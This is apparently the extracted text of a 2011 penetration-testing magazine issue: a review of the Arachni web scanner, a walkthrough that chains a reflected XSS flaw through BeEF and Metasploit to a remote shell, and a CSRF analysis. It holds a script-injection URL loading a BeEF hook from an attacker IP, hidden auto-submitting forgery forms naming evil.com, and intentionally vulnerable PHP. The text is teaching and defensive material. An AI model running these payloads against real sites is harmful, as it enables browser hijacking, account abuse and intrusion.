Penetration test reports are most of the time useless from the developer's point of view, because they do not give specific information that pinpoints where the problem is. This is very ironic, because the developers need to take full advantage of the security report, since most remediation consists of source code fixes.
Security issues found in penetration testing are not for the faint of heart. There can be a lot of high-level security issues, grouped by the OWASP Top 10 (most of the time), with some generic remediation steps such as implement an input filtering policy. This information may not mean anything to a source code developer. They want to know the module, class, or line where the problem exists so that they can fix it. Given enough time, developers can eventually determine where the problem exists, but usually they do not have the time to look through all of the code to find every testing error and still get the application into production.
Let's Close the Gap
What we need to do is define a common ground where security can be integrated into source code somewhat painlessly. Security should be transparent from the development team's point of view. This can be achieved by:
• Creating a development framework that has security built into it
• Designing an API to be used by the application
Putting security into the framework is the Rails approach. Rails' developers added security facilities inside the framework's helpers, so developers inherit secure input filtering, SQL injection protection, and the CSRF protection token. This is a huge step forward in assisting developers with this problem. This methodology works when a programming language has a secure framework for developing web applications. This is true for the Ruby community (other frameworks, like Sinatra, have some security facilities as well). In the Java programming language community there are a lot of non-standardized frameworks available for Java developers,
PAOLO PEREGO
Paolo Perego is an application security specialist interested in fixing the code he just broke with a web application penetration test. He is interested in code review and is working on his own hybrid analysis tool called aurora. He loves Ruby on Rails, kernel hacking, playing guitar, and practicing the Tae kwon-do ITF martial art. He is a husband, a daddy, and a startup wannabe. You may want to check out Paolo's blog or look at his about me page.
WEB APP VULNERABILITIES
Page 22 httppentestmagcom012011 (1) November Page 23 httppentestmagcom012011 (1) November
Arachni is not a so-called inspection proxy, such as the popular commercial but low-cost Burp Suite or the freeware Zed Attack Proxy of the Open Web Application Security Project (OWASP). These tools are really meant to be used by a skilled consultant doing manual investigations of the application.
Arachni is better compared with commercial online scanners, which are pointed at the application and produce a report with no further interaction from the user.
Every security consultant or hacker must understand the strengths and weaknesses of his or her toolset, and must choose the best combination of tools for the job at hand. Is Arachni worthwhile? Time for an in-depth review.
Under the Hood
According to the documentation, Arachni offers the following:
• Simplicity: everything is simple and straightforward, from a user's or component developer's point of view.
• A stable, efficient, and high-performance framework: Arachni allows custom modules, reports, and plug-ins. Developers can easily use the advanced framework features without knowing the nitty-gritty details.
Pulling the Legs of Arachni
Arachni is a fire-and-forget or point-and-shoot web application vulnerability scanner developed in Ruby by Tasos "Zapotek" Laskos. It got quite a good score for the detection of Cross-Site Scripting and SQL Injection issues in the recently publicised vulnerability scanner benchmark by Shay Chen.
Table 1: Overview of audit and reconnaissance modules included with Arachni
Audit Modules:
• SQL injection
• Blind SQL injection using rDiff analysis
• Blind SQL injection using timing attacks
• CSRF detection
• Code injection (PHP, Ruby, Python, JSP, ASP.NET)
• Blind code injection using timing attacks (PHP, Ruby, Python, JSP, ASP.NET)
• LDAP injection
• Path traversal
• Response splitting
• OS command injection (*nix, Windows)
• Blind OS command injection using timing attacks (*nix, Windows)
• Remote file inclusion
• Unvalidated redirects
• XPath injection
• Path XSS
• URI XSS
• XSS
• XSS in event attributes of HTML elements
• XSS in HTML tags
• XSS in HTML script tags

Recon Modules:
• Allowed HTTP methods
• Back-up files
• Common directories
• Common files
• HTTP PUT
• Insufficient Transport Layer Protection for password forms
• WebDAV detection
• HTTP TRACE detection
• Credit card number disclosure
• CVS/SVN user disclosure
• Private IP address disclosure
• Common backdoors
• .htaccess LIMIT misconfiguration
• Interesting responses
• HTML object grepper
• E-mail address disclosure
• US Social Security Number disclosure
• Forceful directory listing
talks to one or more dispatchers that will perform the scanning job. New in the latest experimental branch is that dispatchers can communicate with each other and share the load (the Grid).
This is great if you want to speed up the scan, or if you want to execute some crazy things like running
We can vouch that both the simplicity and performance goals have been attained by Arachni. Since the framework is still under heavy development, stability is sometimes lacking, but at no time did this interfere with our vulnerability assessments.
Arachni is highly modular, both from an architectural point of view and from a source code point of view. The Arachni client (web or command-line) connects to one or more dispatchers that will execute the scan. The connection to these dispatchers can be secured by SSL encryption and certificate-based authentication. One dispatcher can handle multiple clients. Multiple dispatchers can share a load and communicate with each other to optimise and speed up the scanning process.
The asynchronous scanning engine supports both HTTP and HTTPS and has pause/resume functionality. Arachni supports upstream proxies (SOCKS4, SOCKS4A, SOCKS5, HTTP/1.1, and HTTP/1.0) as well as proxy authentication.
The scanner can authenticate against the web application using form-based authentication, HTTP Basic and Digest authentication, and NTLM.
At the start of every scan, a crawler will try to detect all pages. In version 0.3 this was optional, but since version 0.4 the crawler always runs at the start of the scan. The crawler has filters for redundant pages, based on regular expressions and counters, and can include or exclude URLs based on regular expressions. Optionally, the crawler can also follow subdomains. There is also an adjustable link count and redirect limit.
The HTML parser can extract forms, links, cookies, and headers. It gracefully handles badly written HTML thanks to a combination of regular expression analysis and the Nokogiri HTML parser.
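As a toy illustration of that parsing stage (not Arachni's actual implementation; plain Ruby, with deliberately tolerant regular expressions standing in for the Nokogiri pass), extracting audit targets from sloppy HTML might look like:

```ruby
# Toy stand-in for a crawler's parse step: pull link targets and form
# actions out of HTML, tolerating unquoted attributes and unclosed tags.
def extract_targets(html)
  {
    links: html.scan(/<a\s[^>]*href=["']?([^"'\s>]+)/i).flatten,
    forms: html.scan(/<form\s[^>]*action=["']?([^"'\s>]+)/i).flatten
  }
end

sloppy = %q{<a href=/about>About<form action="/search" method=GET>}
p extract_targets(sloppy)
```

A real crawler obviously needs a proper parser for nested and malformed markup, which is exactly why Arachni pairs the regex pass with Nokogiri.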
Arachni offers a very simple and easy-to-use module API, enabling a developer to access helper audit methods and write custom modules in a matter of minutes. Arachni already includes a large number of modules: audit modules and reconnaissance (recon) modules. Table 1 provides an overview.
Arachni offers report management. The following reports can be created: standard output, HTML, XML, TXT, YAML serialization, and the Metareport, which provides Metasploit integration for automated and assisted exploitation.
Arachni has many built-in plug-ins that have direct access to the framework instance. Plug-ins can be used to add any functionality to Arachni. Table 2 provides an overview of the currently available plug-ins.
Installation
Arachni consists of client-side (web or shell) and server-side functionality (the dispatchers). A client
Table 2: Included Arachni plug-ins. Plug-ins have direct access to the framework instance and can be used to add any functionality to Arachni
Plug-ins:
• Passive Proxy: analyses requests and responses between the web application and the browser, assisting in AJAX audits, logging in, and/or restricting the scope of the audit
• Form-based AutoLogin: performs an automated login
• Dictionary attacker: performs dictionary attacks against HTTP authentication and form-based authentication
• Profiler: performs taint analysis with benign inputs and response time analysis
• Cookie collector: keeps track of cookies while establishing a timeline of the changes
• Healthmap: generates a sitemap showing the health (vulnerability present or not) of each crawled/audited URL
• Content-types: logs content-types of server responses, aiding in the identification of interesting (possibly leaked) files
• WAF (Web Application Firewall) Detector: establishes a baseline of normal behaviour and uses rDiff analysis to determine if malicious inputs cause any behavioural changes
• Metamodules: loads and runs high-level meta-analysis modules pre/mid/post-scan:
  • AutoThrottle: dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilization
  • TimeoutNotice: provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with. It also points out the danger of DoS (Denial-of-Service) attacks against pages that perform heavy-duty processing
  • Uniformity: reports inputs that are uniformly vulnerable across a number of pages, hinting at the lack of a central point of input sanitization
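Several of these components (the WAF detector, the blind-injection modules) rely on rDiff-style analysis. Here is the idea in miniature, assuming response length as the only behavioral signal (real implementations diff far more than length; all names are illustrative):

```ruby
# rDiff in miniature: learn a baseline from benign probes, then flag
# any response that diverges from it by more than a tolerance.
def behavioral_change?(baseline_bodies, test_body, tolerance = 0.1)
  avg = baseline_bodies.map(&:length).sum / baseline_bodies.size.to_f
  (test_body.length - avg).abs / avg > tolerance
end

baseline = ['<html>result for probe 1</html>', '<html>result for probe 2</html>']
p behavioral_change?(baseline, '<html>result for probe 3</html>')
# => false (benign input, response looks like the baseline)
p behavioral_change?(baseline, "<html>You have an error in your SQL syntax near '1'</html>")
# => true (malicious input changed the behavior)
```

The appeal of the technique is that it needs no signature for the error page: any sufficiently large divergence from the learned baseline is worth reporting.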
your dispatchers in multiple geographic zones, thanks to Amazon Elastic Compute Cloud (EC2) or similar cloud providers.
Let's get our hands dirty and start with the experimental branch (currently at version 0.4), so we can work with the latest and greatest functionality. Another benefit is that this experimental version can work under Windows.
Installation under Linux is quick and easy, but a Windows set-up requires the installation of Cygwin first. Cygwin is a collection of tools that provide a Linux-like environment on Windows, as well as a large part of the Linux APIs. Another possibility is to run it natively on Windows using MinGW (Minimalist GNU for Windows), but at this moment there are too many problems involved with that.
Linux
Installation under Linux is quite straightforward. Open your favourite shell and execute the commands in Listing 1.
This will install all source directories in your home directory. Change the cd commands if you want the sources somewhere else. In case you need an update to the latest versions, just cd into the three directories above and perform:
$ git pull
$ rake install
Now you can hack the source code locally and play around with Arachni. If you encounter a Typhoeus-related error while running Arachni, issue:
$ gem clean
Windows
Arachni comes with decent documentation, but I had a chuckle when I read the installation instructions for Windows: Windows users should run Arachni in Cygwin. I knew that this was not going to be a smooth ride. Since v0.3 some changes have been made to the experimental version to make it easier, so here we go.
Please note that these installation instructions start with the installation of Cygwin and all required dependencies.
Install or upgrade Cygwin by running setup.exe. Apart from the standard packages, include the following:
• Database: libsqlite3-devel, libsqlite3_0
• Devel: doxygen, libffi4, gcc4, gcc4-core, gcc4-g++, git, libxml2, libxml2-devel, make, openssl-devel
• Editors: nano
• Libs: libxslt, libxslt-devel, libopenssl098, tcltk, libxml2, libmpfr4
• Net: libcurl-devel, libcurl4
Listing 1: Installation for Linux
$ sudo apt-get install libxml2-dev libxslt1-dev libcurl4-openssl-dev libsqlite3-dev
$ cd
$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
$ rake install
Listing 2: Installation for Windows
$ cd
$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
$ rake install
Accept the installation of packages that are required to satisfy dependencies. Note that some of your other tools might not work with these libraries or upgrades. In any case, an upgrade of Cygwin usually results in recompiling any tools that you compiled earlier.
Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand. First we need to install libffi. Execute the following commands in your Cygwin shell:
$ cd
$ git clone http://github.com/atgreen/libffi.git
$ cd libffi
$ ./configure
$ make
$ make install-libLTLIBRARIES
Next is libyaml. Download the latest stable version of libyaml (currently 0.1.4) from http://pyyaml.org/wiki/LibYAML and move it to your Cygwin home folder (probably C:\cygwin\home\your_windows_id). Execute the following:
$ cd
$ tar xvf yaml-0.1.4.tar.gz
$ cd yaml-0.1.4
$ ./configure
$ make
$ make install
Now we need to compile and install Ruby. Download the latest stable release of Ruby (currently ruby-1.9.2-p290.tar.gz) from http://www.ruby-lang.org and move it to your Cygwin home folder. Execute the following commands in the Cygwin shell:
$ cd
$ tar xvf ruby-1.9.2-p290.tar.gz
$ cd ruby-1.9.2-p290
$ ./configure
$ make
$ make install
From your Cygwin shell, update and install some necessary modules:
$ gem update --system
$ gem install rake-compiler
$ cd
$ git clone http://github.com/djberg96/sys-proctable.git
$ cd sys-proctable
$ gem build sys-proctable.gemspec
$ gem install sys-proctable-0.9.1-x86-cygwin.gem
Finally, we can install Arachni (and the source) by executing the commands in Listing 2 in the Cygwin shell (note: these are the same commands as with the Linux installation).
In case of weird error messages (especially on Vista systems) regarding fork during compilation, execute the following in your Cygwin shell:
$ find /usr/local -iname '*.so' > /tmp/localso.lst
Quit all Cygwin shells. Use Windows Explorer to browse to C:\cygwin\bin. Right-click ash.exe and choose Run as administrator. Enter in ash:
$ /bin/rebaseall
$ /bin/rebaseall -T /tmp/localso.lst

Exit ash.
Light my Fire
How to fire up Arachni depends on whether you want to use the new (since version 0.3) web GUI or simply run everything through the command-line interface. Note that the current web GUI does not support all functionality that is available from the command-line.
The GUI can be started by executing the following commands:
$ arachni_rpcd &
$ arachni_web
After that, browse to http://localhost:4567 and admire the new GUI. You will need to attach the GUI to one or more dispatchers. The dispatcher(s) will run the actual scan.
Figure 1: Edit Dispatchers
If you want to use the command-line interface, just execute:
$ arachni --help
A quick overview of the other screens (Figure 1):
• Start a Scan: start a scan by entering the URL and pressing Launch scan. After a scan is launched, the screen gives an overview of which issues are detected and how far along the process is.
• Modules: enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site Scripting (XSS), SQL Injection (SQLi), and Cross-Site Request Forgery (CSRF), detect hidden features, or simply make lists of interesting items such as email addresses.
• Plugins: plug-ins help to automate tasks. Plug-ins are more powerful than modules and make it possible to script login sequences, detect Web Application Firewalls (WAF), perform dictionary attacks, and more.
• Settings: the settings screen allows you to add cookies and headers, limit the scan to certain directories, and more.
• Reports: gives access to the scan reports. Arachni creates reports in its own internal format and exports them to HTML, XML, or text.
• Add-ons: three add-ons are installed:
  • Auto-deploy: converts any SSH-enabled Linux box into an Arachni dispatcher
  • Tutorial: serves as an example
  • Scheduler: schedules and runs scan jobs at a specific time
• Log: overview of actions taken by the GUI.
Your First Scan
We will use both the command-line and the GUI. First the command-line: start a scan with all modules active. This is extremely easy:
$ arachni http://www.example.com --report=afr:outfile=www.example.com.afr
Afterwards, the HTML report can be created by executing the following:
$ arachni --repload=www.example.com.afr --report=html:outfile=www.example.com.html
That's it! Enabling or disabling modules is of course possible. Execute the following command for more information about the possibilities of the command-line interface:
$ arachni --help
Usually it is not necessary to include all recon modules. Some modules will create a lot of requests, making detection of your activities easier (if that is a problem for your assignment) and taking a lot more time to finish. List all modules with the following command:
$ arachni --lsmod
Enabling or disabling modules is easy: use the --mods switch followed by a regular expression to include modules, or exclude modules by prefixing the regular expression with a dash. Example:
$ arachni --mods=*,-xss_* http://www.example.com
The above will load all modules except the modules related to Cross-Site Scripting (XSS).
Using the GUI makes this process even easier. Open the GUI by browsing to http://localhost:4567 and accept the default dispatcher.
The next steps are to verify the settings in the Settings, Modules, and Plugins screens. Once you are satisfied, proceed to the Start a Scan screen.
If you want to run a scan against some test applications, visit my blog for a list of deliberately vulnerable applications. Most of these applications can be installed locally or attacked online (please read all related FAQs and permissions before scanning a site; in most jurisdictions this is illegal unless permission is explicitly granted by the owner).
After the scan, just go to the Reports screen and download the report in the format you want.
Figure 2: Start a scan screen
Listing 3: Create your own module
=begin
  Arachni
  Copyright (c) 2010-2011 Tasos "Zapotek" Laskos <tasos.laskos@gmail.com>

  This is free software; you can copy, distribute and modify
  this program under the terms of the GPL v2.0 License
  (See LICENSE file for details)
=end

module Arachni
module Modules

# Looks for common files on the server, based on wordlists generated
# from open source repositories.
#
# More information about the SVNDigger wordlists:
# http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing
# The SVNDigger word lists were released under the GPL v3.0 License.
#
# @author Herman Stevens
# @see http://cwe.mitre.org/data/definitions/538.html
class SvnDiggerDirs < Arachni::Module::Base

    def initialize( page )
        super( page )
    end

    def prepare
        # to keep track of the requests and not repeat them
        @@__audited     ||= Set.new
        @@__directories ||= []
        return if !@@__directories.empty?
        read_file( 'all-dirs.txt' ) {
            |file|
            # skip blank lines
            @@__directories << file unless file.empty?
        }
    end

    def run( )
        path = get_path( @page.url )
        return if @@__audited.include?( path )

        print_status( 'Scanning SVNDigger Dirs...' )
        @@__directories.each {
            |dirname|
            url = path + dirname + '/'
            print_status( "Checking for #{url}" )
            log_remote_directory_if_exists( url ) {
                |res|
                print_ok( "Found #{dirname} at " + res.effective_url )
            }
        }

        @@__audited << path
    end

    def self.info
        {
            :name        => 'SVNDigger Dirs',
            :description => %q{Finds directories based on wordlists
                created from open source repositories. The wordlist
                utilized by this module is vast and will add a
                considerable amount of time to the overall scan time.},
            :author      => 'Herman Stevens <herman.stevens@gmail.com>',
            :version     => '0.1',
            :references  => {
                'Mavituna Security' =>
                    'http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing',
                'OWASP Testing Guide' =>
                    'https://www.owasp.org/index.php/Testing_for_Old_Backup_and_Unreferenced_Files_(OWASP-CM-006)'
            },
            :targets     => { 'Generic' => 'all' },
            :issue       => {
                :name            => %q{A SVNDigger directory was detected.},
                :description     => %q{},
                :tags            => [ 'svndigger', 'path', 'directory', 'discovery' ],
                :cwe             => '538',
                :severity        => Issue::Severity::INFORMATIONAL,
                :cvssv2          => '',
                :remedy_guidance => %q{Review these resources manually.
                    Check if unauthorized interfaces or confidential
                    information are exposed.},
                :remedy_code     => ''
            }
        }
    end

end
end
end
Create your Own Module
Arachni is very modular and can be easily extended. In the following example, we create a new reconnaissance module.
Move into your Arachni source tree and you'll find the modules directory. In there you'll find two directories: audit and recon. Move into the recon directory; this is where we will create our Ruby module.
Arachni makes it really easy: if your module needs external files, it will search in a subdirectory with the same name. For example, if you create a svn_digger_dirs.rb module, this module is able to find external files in the modules/recon/svn_digger_dirs/ subdirectory.
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing. These wordlists are based on directories found in open source code repositories.
If there is a directory that needed to be protected and you forgot to do so, it will be found by a scanner that uses these wordlists.
Furthermore, it can be used as a basis for reconnaissance: if a directory or file is detected, this might provide clues about which technology the site is using.
Download the wordlists from the above URL. Create a directory modules/recon/svn_digger_dirs and move the file all-dirs.txt from the wordlist archive to the newly created directory.
Create a copy of the file modules/recon/common_directories.rb and name it svn_digger_dirs.rb. Change the code to read as shown in Listing 3.
The code does not need a lot of explanation: it checks whether or not a specific directory exists; if yes, it forwards the name to the Arachni Trainer (which will include the directory in further scans) and creates a report entry for it.
Note: the above code, as well as another module based on the SVNDigger wordlists with filenames, is now part of the experimental Arachni code base.
Conclusion
We used Arachni in many of our application vulnerability assessments. The good points are:
• Highly scalable architecture: just create more servers with dispatchers and share the load. This makes the scanner a lot more responsive and fast.
• Highly extensible: create your own modules, plug-ins, and even reports with ease.
• User-friendly: start your scan in minutes.
• Very good XSS and SQLi detection, with very few false positives. There are false negatives, but this is usually caused by Arachni not detecting the links to be audited. This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy.
• Excellent reporting capabilities, with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE).
Arachni lacks support for the following:
• No AJAX and JSON support
• No JavaScript support
This means that you need to help Arachni find links hidden in JavaScript, e.g. by using it as a proxy between your browser and the web application. You'll need a different tool (or use your brain and manual tests) to check for AJAX/JSON-related vulnerabilities in the application you are testing.
Arachni also cannot examine and decompile Flash components, but a lot of tools are at hand to help you with that. Arachni does not perform WAF (Web Application Firewall) evasion, but then again, this is not necessarily difficult to do manually for a skilled consultant or hacker.
And why not write your own module or plug-in that implements the missing functionality? Arachni is certainly a tool worth adding to your toolkit.
HERMAN STEVENS
After a career of 15 years spanning many roles (developer, security product trainer, information security consultant, Payment Card Industry auditor, application security consultant), Herman Stevens now works and lives in Singapore, where he is the director of his company, Astyran Pte Ltd (http://www.astyran.com). Astyran specialises in application security, such as penetration tests, vulnerability assessments, secure code reviews, awareness training, and security in the SDLC. Contact Herman through email (herman.stevens@gmail.com) or visit his blog (http://blog.astyran.sg).
In most commercial penetration testing reports, it's sufficient to just show a small alert popup; this shows that a particular parameter is vulnerable to an XSS attack. However, this is not how an attacker would operate in the real world. Sure, he'd use a popup initially to find out which parameter is vulnerable to an XSS attack. Once he's identified that, though, he'll look to steal information by executing malicious JavaScript, or even gain total control of the user's machine.
In this article we'll look at how an attacker can gain complete control over a user's browser, ultimately taking over the user's machine, by using BeEF (a browser exploitation framework).
A Simple POC
To start off, let's do exactly what the attacker would do, which is to identify a vulnerability. For simplicity's sake, we'll assume that the attacker has already identified a vulnerable parameter on a page. Here are the relevant files, which you can use on your own web server if you want to try this:
HTML Page:

<HTML>
<BODY>
<FORM NAME="test" action="search1.php" method="GET">
Search: <INPUT TYPE="text" name="search"></INPUT>
<INPUT TYPE="submit" name="Submit" value="Submit"></INPUT>
</FORM>
</BODY>
</HTML>
XSS, BeEF, Metasploit Exploitation
Figure 2: BeEF after configuration
Cross-Site Scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code in the victim's browser. The impact of an XSS attack is only limited by the potency of the attacker's JavaScript code.
Figure 1: User enters input in a search box
and click a few buttons to configure it. Alternatively, you could use a distribution like BackTrack, which already has BeEF installed. Here is a screenshot of how BeEF looks after it is configured (Figure 2).
Instead of clicking a link which generates a popup box, the user will instead be tricked into clicking a link which tells his browser to connect to the BeEF controller. The URL that the user has to click on is:
http://localhost/search1.php?search=<script src='http://192.168.56.101/beef/hook/beefmagic.js.php'></script>&Submit=Submit
The IP address here is the one on which you have BeEF running. Once the user clicks on the link above, you should see an entry in the BeEF controller window showing that a zombie has connected. You can see this in the Log section on the right-hand side or the Zombie section on the left-hand side. Here is a screenshot which shows that a browser has connected to the BeEF controller (Figure 3).
Click and highlight the zombie in the left pane, and then click on Standard Modules, then Alert Dialog. This will result in a little popup box on the victim machine. Here's a screenshot which shows the same (Figure 4), and this is what the victim will see (Figure 5).
So, as you can see, because of BeEF even an unskilled attacker can run code which he does not even understand on the victim's machine and steal sensitive data. Hence it becomes all the more
Server Side PHP Code
<?php
$a = $_GET['search'];
echo "The parameter passed is $a";
?>
As you can see, it's some very simple code: the user enters something in a search box on the first page, and his input is sent to the server, which reads the value of the parameter and prints it to the screen. So if, instead of simple text, the attacker enters JavaScript into the box, the JavaScript will execute on the user's machine rather than be displayed. The user hence just has to be tricked into clicking on a link: http://localhost/search1.php?search=<script>alert(document.domain)</script>
The screenshot below clarifies the above steps (Figure 1)
BeEF – Hook the User's Browser
Now while this example is sufficient to prove that the site is vulnerable to XSS, it's most certainly not where an attacker will stop. An attacker will use a tool like BeEF (Browser Exploitation Framework) to gain more control of the user's browser and machine.
I used an older version of BeEF (0.3.2) as I just wanted to demonstrate what you can do with such a tool. The newer version has been rewritten completely and has many more features. For now though, extract BeEF from the tarball and copy it into your web server directory.
Figure 3. Connection with the BeEF controller
Figure 4. What the attacker will see
Figure 5. What the victim will see
Figure 6. Defacing the current web page
important to protect against XSS. We'll have a small section right at the end where I briefly tell you how to mitigate XSS.
I'll quickly discuss a few more examples using BeEF before we move on to using it as a platform for other attacks. Here are the screenshots for the same; these are all a result of clicking on the various modules available under the Standard Modules menu.
Defacing the Current Web Page
This results in the webpage being rewritten on the victim browser with the text in the 'DEFACE STRING' box. Try it out (Figure 6).
Detect all Plugins on the User's Browser
There are plenty of other plug-ins inside BeEF under the Standard Modules and Browser Modules tabs which you can try out for yourself. I won't discuss all of them here as the principle is the same. What I want to do now, though, is use the user's hooked browser to take complete control of the user's machine itself (Figure 7).
Integrate BeEF with Metasploit and Get a Shell
Edit BeEF's configuration files so that it can directly talk to Metasploit. All I had to edit was msf.php, to set the correct IP address. Once this is done you can launch Metasploit's browser-based exploits from inside BeEF.
Figure 7. Detecting plugins on the user's browser
Figure 8. Starting Metasploit
Figure 9. The "jobs" command
Figure 10. Metasploit after clicking "Send Now"
Figure 11. Meterpreter window - screenshot 1
Figure 12. Meterpreter window - screenshot 2
Now first ensure that the Zombie is still connected. Then click on Standard Modules – Browser Exploit and configure the exploit as per the screenshot below. We're basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8).
Open a shell and run msfconsole to start Metasploit. Once you see the msf> prompt, click the zombie in the browser and click the Send Now button to send the exploit payload to the victim. You can immediately check if BeEF can talk to Metasploit by running the jobs command (Figure 9).
If the victim's browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit), it will connect back to the running Metasploit instance. Here's what you see in Metasploit a while after you click Send Now (Figure 10).
Once you've got a prompt, you're on that remote system and can do anything that you want with the privileges of that user. Here are a few more screenshots of what you can do with Meterpreter. The screenshots are self-explanatory, so I won't say much (Figures 11-13).
The user was apparently logged in with admin privileges, so we could create a user by the name dennis on the remote machine. At this point we have complete control over one machine.
Once we have control over this machine, we can use FTP or HTTP to download various other tools (Nmap, Nessus, a sniffer to capture all keystrokes on this machine, or even another copy of Metasploit) and install them on it. We can then use these to port-scan an entire internal network or search for vulnerabilities in services running on other machines on the network. Eventually, over a period of time, it is potentially possible to compromise every machine on that network.
Mitigation
To mitigate XSS one must do the following:
Figure 13. Meterpreter window - screenshot 3
bull Make a list of parameters whose values depend on user input and whose resultant values, after they are processed by application code, are reflected in the user's browser.
bull All such output must be encoded before displaying it to the user. The OWASP XSS Prevention Cheat Sheet is a good guide for this.
bull Whitelist and blacklist filtering can also be used to completely disallow specific characters in user input fields.
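The encoding step above can be sketched as a small helper that HTML-encodes the significant characters before a value is reflected. This is a minimal JavaScript sketch (the function name is mine, not from the article), covering the HTML body context only; per the OWASP cheat sheet, attribute and JavaScript contexts need additional rules:

```javascript
// Encode the characters that are significant in an HTML context, so that
// reflected user input is rendered as text instead of being parsed as markup.
function encodeForHtml(input) {
  return String(input)
    .replace(/&/g, "&amp;")   // must run first, before entities are introduced
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}
```

With this in place, the earlier search example would print `&lt;script&gt;alert(document.domain)&lt;/script&gt;` as harmless text instead of executing it.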
Conclusion
In a nutshell, we can conclude that if even a single parameter is vulnerable to XSS, it can result in the complete compromise of that user's machine. If the XSS is persistent, the number of users that could potentially be in trouble increases. So while XSS does involve some kind of user interaction, like clicking a link or visiting a page, it is still a high-risk vulnerability and must be mitigated throughout every application.
ARVIND DORAISWAMY
Arvind Doraiswamy is an Information Security Professional with 6 years of experience in System/Network and Web Application Penetration Testing. In addition, he freelances in information security audits, trainings and product development [Perl, Ruby on Rails], while spending a lot of time learning more about malware analysis and reverse engineering.
Email – arvinddoraiswamy@gmail.com
LinkedIn – http://www.linkedin.com/pub/arvind-doraiswamy/39/b21/332
Other writings – http://resources.infosecinstitute.com/author/arvind and http://ardsec.blogspot.com
References
bull http://www.technicalinfo.net/papers/CSS.html
bull https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
bull https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
bull http://beefproject.com
In simple words: an evil website posts a new status to your Twitter account while your Twitter login session is still active.
CSRF Basics
A simple example of this is the following hidden HTML code inside the evil.com webpage:
<img src="http://twitter.com/home?status=evil.com"
style="display:none">
Many web developers use POST instead of GET requests to avoid this kind of malicious attack. But this approach is useless, as shown by the following HTML code used to bypass that kind of protection (Listing 1).
Useless Defenses
The following are the weak defenses:
Only accept POST: This stops simple link-based attacks (IMG, frames, etc.), but hidden POST requests can be created within frames, scripts, etc.
Referrer checking: Some users prohibit referrers, so you cannot simply require referrer headers. Techniques to selectively create HTTP requests without referrers also exist.
Requiring multi-step transactions: CSRF attacks can simply perform each step in order.
Defense
The approach used by many web developers is CAPTCHA systems and one-time tokens. CAPTCHA systems are widely used, but asking a user to fill in the text from the CAPTCHA image every time he submits a form might make users stop visiting your website. This is why web sites use one-time tokens. Unlike the CAPTCHA system, one-time tokens are unique values stored in a
Cross-site Request Forgery
IN-DEPTH ANALYSIS • CYBER GATES • 2011
Cross-Site Request Forgery (CSRF for short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of an authorized user.
Listing 1. HTML code used to bypass protection
<div style="display:none">
<iframe name="hiddenFrame"></iframe>
<form name="Form" action="http://site.com/post.php"
      target="hiddenFrame"
      method="POST">
<input type="text" name="message" value="I like www.evil.com" >
<input type="submit" >
</form>
<script>document.Form.submit()</script>
</div>
index.php (Victim website)
And the webpage which processes the request and stores the message only if the given token is correct:
post.php (Victim website)
In-depth Analysis
In-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token. The following is a real scenario (Listing 4):
index.php (Evil website)
For security reasons, the same-origin policy in browsers restricts browser-side programming languages such as JavaScript from accessing remote content, and the browser throws the following exception:
Permission denied to access property 'document'
var token = window.frames[0].document.forms['messageForm'].token.value;
A browser's settings are not hard to modify, so the best approach to web application security is to secure the web application itself.
Frame Busting
The best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens. FrameKillers are small pieces of JavaScript code used to protect web pages from being framed:
<script type="text/javascript">
if(top != self) top.location.replace(location);
</script>
It consists of a conditional statement and a counter-action statement.
Common conditional statements are the following:
if (top != self)
if (top.location != self.location)
if (top.location != location)
if (parent.frames.length > 0)
if (window != top)
if (window.top !== window.self)
if (window.self != window.top)
if (parent && parent != window)
if (parent && parent.frames && parent.frames.length > 0)
if ((self.parent && !(self.parent === self)) && (self.parent.frames.length != 0))
webpage form's hidden field and in a session at the same time, so they can be compared after the form is submitted.
Subverting one-time tokens is usually attempted through brute-force attacks, which are worthwhile only if the token mechanism is widely used by web developers. For example, the following PHP code:
<?php
$token = md5(uniqid(rand(), TRUE));
$_SESSION['token'] = $token;
?>
Defense Using One-time Tokens
To understand better how this system works, let's take a look at a simple webpage which has a form with a one-time token (Listing 2).
Listing 2. Wrong token
<?php session_start()?>
<html>
<head>
<title>GOOD.COM</title>
</head>
<body>
<?php
$token = md5(uniqid(rand(), true));
$_SESSION['token'] = $token;
?>
<form name="messageForm" action="post.php" method="POST">
<input type="text" name="message">
<input type="submit" value="Post">
<input type="hidden" name="token" value="<?php echo $token?>">
</form>
</body>
</html>
Listing 3. Correct token
<?php
session_start();
if($_SESSION['token'] == $_POST['token']) {
    $message = $_POST['message'];
    echo "<b>Message</b><br>$message";
    $file = fopen("messages.txt", "a");
    fwrite($file, $message."\r\n");
    fclose($file);
} else {
    echo "Bad request";
}
?>
And common counter-action statements are these:
top.location = self.location
top.location.href = document.location.href
